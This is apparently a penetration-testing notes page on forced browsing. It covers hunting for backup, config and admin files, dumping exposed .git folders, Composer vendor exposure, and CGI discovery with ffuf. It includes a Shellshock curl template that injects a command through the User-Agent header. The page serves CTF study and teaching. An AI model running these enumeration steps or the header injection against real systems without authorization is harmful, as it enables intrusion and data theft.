Forced Browsing

contentdiscovery adventofcyber2 webenumerationv2 sqlmap picklerick vulnversity basicpentestingjt blaster rrootme startup wgelctf allinonemj mustacchio chillhack githappens lianyu easypeasyctf gamingserver cyborgt8 md2pdf surfer bruteit archangel teamcw pythonplayground techsupp0rt1 nax nibbles devvortex cozyhosting bashed blocky backup_file php_register_globals

Forced browsing is a technique in which we test URLs crafted from a list of common files/folders and we try to find something juicy.

  • πŸ§ƒ Configuration files (ex: .config)
  • πŸ‘€ Old files (ex: index.php.old)
  • πŸ’΅ Backup files (ex: xxx.bak, backup.xxx, xxx~)
  • πŸ”‘ Admin/CMS panels (ex: WordPress admin login page)
  • πŸ’° Private files (ex: documents...)

Refer to wordlists#forced browsing for wordlists. ⚠️ Start with small wordlists, then move to bigger one. They don't have the same entries.

Common tools are:

For extensions: php,html,txt,sql,bak,tar,tar.gz,db,zip,sqlite.

Additional Notes

Version Control Files Disclosure

githappens insecure_code_management starbug_bounty

Sometimes, version control files such as .git for GIT may be exposed. They can be used to find the current and the previous versions of the code. For instance, after downloading a .git:

$ cd .git
$ git diff                  # it says the code is missing
$ git restore *             # restore current version
$ git log -p -- config.php  # look at config.php history
$ git show commit_id

A few automated tools: GitHacker (1.4k ⭐, 2023 πŸͺ¦) GitTools (3.8k ⭐, 2022 πŸͺ¦, πŸ‘»), GitHack (3.1k ⭐, 2022 πŸͺ¦) and git-dumper (1.8k ⭐).

$ DEST="$HOME/tools/gitdumper"
$ git clone -b "master" https://github.com/arthaud/git-dumper $DEST
$ git-dumper URL/.git/ dump

πŸ“š .git may be blocked (403) but .git/index, .git/HEAD, etc. may not.

⚠️ We are downloading potentially harmful files. This is dangerous as it may lead to RCE. Manually check the git configuration files before running any git commands!

Composer Vendor Folder Exposure

surfer

Composer is a package manager for PHP. From composer.json, it creates a vendor folder with the PHP packages.

This folder should not be available for remote users.

CGI Scripts

attacking_common_applications adventofcyber2 shocker

Common Gateway Interface (CGI) Applications are rarely used as they are dangerous. They were often used to connect multiple applications. CGI scripts can be written in many languages. They have a few advantages and many major disadvantages. To look for them:

$ ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt -u URL/cgi/FUZZ -e .bat,.cmd
$ ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt -u URL/cgi-bin/FUZZ -e .cgi,.pl,.c,.sh,.py

πŸ“š Apache Tomcat returns 404 for /cgi even when it exists.

⚠️ Bash [<4.3] has a vulnerability called shellshock, that can also be exploited with metasploit (apache_mod_cgi_bash_env_exec):

$ curl -H 'User-Agent: () { :; }; <write code here>' 'URL/cgi-bin/some_script'

πŸ‘» To-do πŸ‘»

Stuff that I found, but never read/used yet.

blocky

  • AJax Rendered Page, automation?
  • .DS_STORE, contains a list of files, blog